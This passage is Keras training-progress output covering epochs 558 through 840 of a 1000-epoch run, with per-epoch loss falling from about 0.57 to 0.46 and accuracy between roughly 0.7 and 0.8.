558/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5707 - accuracy: 0.7400\nEpoch 559/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5523 - accuracy: 0.7400\nEpoch 560/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5559 - accuracy: 0.8000\nEpoch 561/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5446 - accuracy: 0.7800\nEpoch 562/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5663 - accuracy: 0.7400\nEpoch 563/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5537 - accuracy: 0.7600\nEpoch 564/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5524 - accuracy: 0.7600\nEpoch 565/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5459 - accuracy: 0.7400\nEpoch 566/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5512 - accuracy: 0.7600\nEpoch 567/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5454 - accuracy: 0.7200\nEpoch 568/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5443 - accuracy: 0.7600\nEpoch 569/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5536 - accuracy: 0.7400\nEpoch 570/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5414 - accuracy: 0.7200\nEpoch 571/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5442 - accuracy: 0.7400\nEpoch 572/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5415 - accuracy: 0.7600\nEpoch 573/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5331 - accuracy: 0.7800\nEpoch 574/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6041 - accuracy: 0.7200\nEpoch 575/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5517 - accuracy: 0.8000\nEpoch 576/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5477 - accuracy: 0.7600\nEpoch 577/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.5641 - accuracy: 0.7800\nEpoch 578/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5413 - accuracy: 0.7200\nEpoch 579/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5344 - accuracy: 0.7600\nEpoch 580/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5493 - accuracy: 0.7800\nEpoch 581/1000\n10/10 
[==============================] - 0s 6ms/step - loss: 0.5138 - accuracy: 0.7800\nEpoch 582/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5437 - accuracy: 0.7800\nEpoch 583/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5417 - accuracy: 0.8200\nEpoch 584/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5273 - accuracy: 0.7800\nEpoch 585/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5363 - accuracy: 0.7800\nEpoch 586/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5399 - accuracy: 0.7400\nEpoch 587/1000\n10/10 [==============================] - 0s 9ms/step - loss: 0.5449 - accuracy: 0.7400\nEpoch 588/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5299 - accuracy: 0.7800\nEpoch 589/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5343 - accuracy: 0.7400\nEpoch 590/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5221 - accuracy: 0.7600\nEpoch 591/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5473 - accuracy: 0.7600\nEpoch 592/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5420 - accuracy: 0.7800\nEpoch 593/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5325 - accuracy: 0.7800\nEpoch 594/1000\n10/10 [==============================] - 0s 9ms/step - loss: 0.5553 - accuracy: 0.7600\nEpoch 595/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5490 - accuracy: 0.7200\nEpoch 596/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5278 - accuracy: 0.7600\nEpoch 597/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5381 - accuracy: 0.7400\nEpoch 598/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5212 - accuracy: 0.7600\nEpoch 599/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5274 - accuracy: 0.7400\nEpoch 600/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5604 - accuracy: 0.7400\nEpoch 601/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5565 - accuracy: 0.8000\nEpoch 602/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.6037 - accuracy: 0.7200\nEpoch 603/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5654 - accuracy: 0.7600\nEpoch 604/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5496 - accuracy: 0.7400\nEpoch 605/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5308 - accuracy: 0.7600\nEpoch 606/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5532 - accuracy: 0.7200\nEpoch 607/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5454 - accuracy: 0.7600\nEpoch 608/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5613 - accuracy: 0.7400\nEpoch 609/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5768 - accuracy: 0.8000\nEpoch 610/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5687 - accuracy: 0.7400\nEpoch 611/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5233 - accuracy: 0.7800\nEpoch 612/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5426 - accuracy: 0.7400\nEpoch 613/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5655 - accuracy: 0.7600\nEpoch 614/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5867 - accuracy: 0.7200\nEpoch 615/1000\n10/10 
[==============================] - 0s 5ms/step - loss: 0.5655 - accuracy: 0.7600\nEpoch 616/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5190 - accuracy: 0.7800\nEpoch 617/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5168 - accuracy: 0.7400\nEpoch 618/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5170 - accuracy: 0.7400\nEpoch 619/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5322 - accuracy: 0.7400\nEpoch 620/1000\n10/10 [==============================] - 0s 10ms/step - loss: 0.5359 - accuracy: 0.7800\nEpoch 621/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5235 - accuracy: 0.7600\nEpoch 622/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5339 - accuracy: 0.7800\nEpoch 623/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5286 - accuracy: 0.8000\nEpoch 624/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.5433 - accuracy: 0.7400\nEpoch 625/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5233 - accuracy: 0.7600\nEpoch 626/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5096 - accuracy: 0.7400\nEpoch 627/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5136 - accuracy: 0.7800\nEpoch 628/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5098 - accuracy: 0.7400\nEpoch 629/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5202 - accuracy: 0.7400\nEpoch 630/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5116 - accuracy: 0.7800\nEpoch 631/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5092 - accuracy: 0.7400\nEpoch 632/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5325 - accuracy: 0.7600\nEpoch 633/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5199 - accuracy: 0.7600\nEpoch 634/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5354 - accuracy: 0.7600\nEpoch 635/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5199 - accuracy: 0.7400\nEpoch 636/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5107 - accuracy: 0.7400\nEpoch 637/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5163 - accuracy: 0.7400\nEpoch 638/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5220 - accuracy: 0.7600\nEpoch 639/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5292 - accuracy: 0.7200\nEpoch 640/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5367 - accuracy: 0.7200\nEpoch 641/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5181 - accuracy: 0.7200\nEpoch 642/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5262 - accuracy: 0.7400\nEpoch 643/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5381 - accuracy: 0.7600\nEpoch 644/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5600 - accuracy: 0.6800\nEpoch 645/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5296 - accuracy: 0.7800\nEpoch 646/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5135 - accuracy: 0.7400\nEpoch 647/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5088 - accuracy: 0.7400\nEpoch 648/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5191 - accuracy: 0.7200\nEpoch 649/1000\n10/10 
[==============================] - 0s 5ms/step - loss: 0.5090 - accuracy: 0.7800\nEpoch 650/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5197 - accuracy: 0.7400\nEpoch 651/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5186 - accuracy: 0.7400\nEpoch 652/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5212 - accuracy: 0.7600\nEpoch 653/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5122 - accuracy: 0.7400\nEpoch 654/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5158 - accuracy: 0.7400\nEpoch 655/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5123 - accuracy: 0.7800\nEpoch 656/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4982 - accuracy: 0.7600\nEpoch 657/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5030 - accuracy: 0.7800\nEpoch 658/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4994 - accuracy: 0.7800\nEpoch 659/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5128 - accuracy: 0.7600\nEpoch 660/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5228 - accuracy: 0.7800\nEpoch 661/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5190 - accuracy: 0.7600\nEpoch 662/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5063 - accuracy: 0.7600\nEpoch 663/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5032 - accuracy: 0.7600\nEpoch 664/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5042 - accuracy: 0.7800\nEpoch 665/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4981 - accuracy: 0.8000\nEpoch 666/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5199 - accuracy: 0.7800\nEpoch 667/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5235 - accuracy: 0.7600\nEpoch 668/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5067 - accuracy: 0.7800\nEpoch 669/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5139 - accuracy: 0.7400\nEpoch 670/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5169 - accuracy: 0.7600\nEpoch 671/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5292 - accuracy: 0.7600\nEpoch 672/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5193 - accuracy: 0.7800\nEpoch 673/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5140 - accuracy: 0.7600\nEpoch 674/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5200 - accuracy: 0.7800\nEpoch 675/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5069 - accuracy: 0.7800\nEpoch 676/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5016 - accuracy: 0.7200\nEpoch 677/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5108 - accuracy: 0.7600\nEpoch 678/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5217 - accuracy: 0.7600\nEpoch 679/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5218 - accuracy: 0.7200\nEpoch 680/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5080 - accuracy: 0.7400\nEpoch 681/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5088 - accuracy: 0.7400\nEpoch 682/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5151 - accuracy: 0.8000\nEpoch 683/1000\n10/10 
[==============================] - 0s 5ms/step - loss: 0.5020 - accuracy: 0.7800\nEpoch 684/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5539 - accuracy: 0.7200\nEpoch 685/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5223 - accuracy: 0.7600\nEpoch 686/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5530 - accuracy: 0.7200\nEpoch 687/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.5172 - accuracy: 0.7800\nEpoch 688/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4951 - accuracy: 0.7800\nEpoch 689/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4923 - accuracy: 0.7800\nEpoch 690/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5045 - accuracy: 0.7600\nEpoch 691/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5027 - accuracy: 0.7800\nEpoch 692/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4986 - accuracy: 0.7600\nEpoch 693/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4972 - accuracy: 0.7800\nEpoch 694/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5020 - accuracy: 0.7400\nEpoch 695/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5067 - accuracy: 0.7400\nEpoch 696/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5130 - accuracy: 0.7800\nEpoch 697/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5025 - accuracy: 0.7600\nEpoch 698/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4934 - accuracy: 0.7400\nEpoch 699/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5007 - accuracy: 0.7800\nEpoch 700/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4890 - accuracy: 0.7600\nEpoch 701/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4891 - accuracy: 0.7600\nEpoch 702/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4937 - accuracy: 0.7400\nEpoch 703/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4934 - accuracy: 0.7800\nEpoch 704/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5068 - accuracy: 0.7200\nEpoch 705/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4851 - accuracy: 0.7600\nEpoch 706/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4938 - accuracy: 0.8000\nEpoch 707/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4889 - accuracy: 0.7400\nEpoch 708/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5064 - accuracy: 0.7600\nEpoch 709/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5188 - accuracy: 0.7600\nEpoch 710/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5089 - accuracy: 0.7800\nEpoch 711/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4891 - accuracy: 0.8000\nEpoch 712/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4878 - accuracy: 0.7800\nEpoch 713/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4889 - accuracy: 0.7800\nEpoch 714/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4879 - accuracy: 0.7400\nEpoch 715/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4986 - accuracy: 0.7000\nEpoch 716/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4864 - accuracy: 0.7800\nEpoch 717/1000\n10/10 
[==============================] - 0s 7ms/step - loss: 0.4856 - accuracy: 0.7600\nEpoch 718/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5066 - accuracy: 0.8000\nEpoch 719/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4886 - accuracy: 0.7600\nEpoch 720/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5073 - accuracy: 0.7400\nEpoch 721/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5182 - accuracy: 0.7400\nEpoch 722/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5489 - accuracy: 0.7000\nEpoch 723/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5300 - accuracy: 0.8000\nEpoch 724/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5234 - accuracy: 0.7200\nEpoch 725/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4916 - accuracy: 0.7600\nEpoch 726/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4887 - accuracy: 0.7400\nEpoch 727/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5122 - accuracy: 0.7200\nEpoch 728/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5393 - accuracy: 0.7400\nEpoch 729/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5145 - accuracy: 0.7800\nEpoch 730/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5277 - accuracy: 0.8000\nEpoch 731/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5106 - accuracy: 0.7200\nEpoch 732/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5692 - accuracy: 0.7800\nEpoch 733/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5591 - accuracy: 0.7000\nEpoch 734/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5141 - accuracy: 0.7200\nEpoch 735/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5099 - accuracy: 0.7600\nEpoch 736/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4936 - accuracy: 0.7600\nEpoch 737/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4916 - accuracy: 0.8200\nEpoch 738/1000\n10/10 [==============================] - 0s 9ms/step - loss: 0.5034 - accuracy: 0.7200\nEpoch 739/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.5160 - accuracy: 0.7600\nEpoch 740/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4962 - accuracy: 0.8000\nEpoch 741/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4857 - accuracy: 0.7800\nEpoch 742/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5080 - accuracy: 0.7600\nEpoch 743/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4716 - accuracy: 0.8000\nEpoch 744/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4865 - accuracy: 0.7800\nEpoch 745/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5023 - accuracy: 0.7400\nEpoch 746/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5040 - accuracy: 0.7400\nEpoch 747/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4985 - accuracy: 0.7200\nEpoch 748/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4766 - accuracy: 0.7400\nEpoch 749/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4910 - accuracy: 0.7600\nEpoch 750/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4965 - accuracy: 0.7800\nEpoch 751/1000\n10/10 
[==============================] - 0s 6ms/step - loss: 0.4886 - accuracy: 0.7600\nEpoch 752/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4814 - accuracy: 0.7200\nEpoch 753/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4800 - accuracy: 0.7800\nEpoch 754/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4785 - accuracy: 0.7600\nEpoch 755/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4750 - accuracy: 0.7200\nEpoch 756/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4866 - accuracy: 0.7600\nEpoch 757/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5044 - accuracy: 0.7400\nEpoch 758/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4994 - accuracy: 0.7800\nEpoch 759/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5016 - accuracy: 0.7600\nEpoch 760/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4797 - accuracy: 0.7400\nEpoch 761/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4993 - accuracy: 0.7800\nEpoch 762/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4822 - accuracy: 0.7600\nEpoch 763/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4799 - accuracy: 0.7800\nEpoch 764/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4743 - accuracy: 0.8000\nEpoch 765/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4921 - accuracy: 0.7600\nEpoch 766/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4858 - accuracy: 0.7400\nEpoch 767/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4759 - accuracy: 0.7200\nEpoch 768/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4936 - accuracy: 0.7600\nEpoch 769/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4708 - accuracy: 0.7800\nEpoch 770/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5029 - accuracy: 0.7600\nEpoch 771/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5095 - accuracy: 0.7400\nEpoch 772/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4761 - accuracy: 0.7800\nEpoch 773/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4837 - accuracy: 0.7400\nEpoch 774/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4733 - accuracy: 0.7600\nEpoch 775/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4933 - accuracy: 0.7600\nEpoch 776/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4700 - accuracy: 0.7600\nEpoch 777/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4668 - accuracy: 0.7800\nEpoch 778/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4800 - accuracy: 0.8000\nEpoch 779/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4739 - accuracy: 0.8000\nEpoch 780/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4999 - accuracy: 0.7800\nEpoch 781/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4942 - accuracy: 0.7400\nEpoch 782/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4827 - accuracy: 0.7400\nEpoch 783/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4731 - accuracy: 0.7200\nEpoch 784/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4966 - accuracy: 0.7800\nEpoch 785/1000\n10/10 
[==============================] - 0s 8ms/step - loss: 0.4872 - accuracy: 0.7600\nEpoch 786/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4763 - accuracy: 0.7800\nEpoch 787/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4788 - accuracy: 0.7800\nEpoch 788/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4792 - accuracy: 0.7800\nEpoch 789/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4746 - accuracy: 0.7800\nEpoch 790/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4713 - accuracy: 0.7600\nEpoch 791/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4749 - accuracy: 0.7800\nEpoch 792/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4626 - accuracy: 0.7800\nEpoch 793/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4640 - accuracy: 0.7800\nEpoch 794/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4705 - accuracy: 0.7600\nEpoch 795/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4642 - accuracy: 0.7800\nEpoch 796/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4832 - accuracy: 0.7400\nEpoch 797/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4715 - accuracy: 0.7800\nEpoch 798/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4843 - accuracy: 0.7800\nEpoch 799/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4622 - accuracy: 0.7800\nEpoch 800/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4632 - accuracy: 0.8000\nEpoch 801/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4812 - accuracy: 0.7600\nEpoch 802/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4766 - accuracy: 0.7400\nEpoch 803/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4807 - accuracy: 0.7800\nEpoch 804/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.5044 - accuracy: 0.7400\nEpoch 805/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4801 - accuracy: 0.7400\nEpoch 806/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4680 - accuracy: 0.8000\nEpoch 807/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4706 - accuracy: 0.7200\nEpoch 808/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4596 - accuracy: 0.7800\nEpoch 809/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4716 - accuracy: 0.7400\nEpoch 810/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4778 - accuracy: 0.7800\nEpoch 811/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4745 - accuracy: 0.7600\nEpoch 812/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4774 - accuracy: 0.7600\nEpoch 813/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4540 - accuracy: 0.8000\nEpoch 814/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4738 - accuracy: 0.7600\nEpoch 815/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4764 - accuracy: 0.7600\nEpoch 816/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4734 - accuracy: 0.7400\nEpoch 817/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4756 - accuracy: 0.7600\nEpoch 818/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4627 - accuracy: 0.7400\nEpoch 819/1000\n10/10 
[==============================] - 0s 9ms/step - loss: 0.4675 - accuracy: 0.7800\nEpoch 820/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4681 - accuracy: 0.7800\nEpoch 821/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4673 - accuracy: 0.7600\nEpoch 822/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4719 - accuracy: 0.7800\nEpoch 823/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4637 - accuracy: 0.7400\nEpoch 824/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4771 - accuracy: 0.7400\nEpoch 825/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4685 - accuracy: 0.7800\nEpoch 826/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4804 - accuracy: 0.7400\nEpoch 827/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4792 - accuracy: 0.7800\nEpoch 828/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4634 - accuracy: 0.7600\nEpoch 829/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4677 - accuracy: 0.7600\nEpoch 830/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.5080 - accuracy: 0.7400\nEpoch 831/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.5002 - accuracy: 0.7200\nEpoch 832/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4694 - accuracy: 0.7600\nEpoch 833/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4601 - accuracy: 0.7400\nEpoch 834/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4690 - accuracy: 0.7200\nEpoch 835/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4564 - accuracy: 0.7600\nEpoch 836/1000\n10/10 [==============================] - 0s 8ms/step - loss: 0.4669 - accuracy: 0.7400\nEpoch 837/1000\n10/10 [==============================] - 0s 7ms/step - loss: 0.4596 - accuracy: 0.8000\nEpoch 838/1000\n10/10 [==============================] - 0s 9ms/step - loss: 0.4725 - accuracy: 0.7200\nEpoch 839/1000\n10/10 [==============================] - 0s 6ms/step - loss: 0.4692 - accuracy: 0.7600\nEpoch 840/1000\n10/10 [==============================] - 0s 5ms/step - loss: 0.4595 - accuracy: 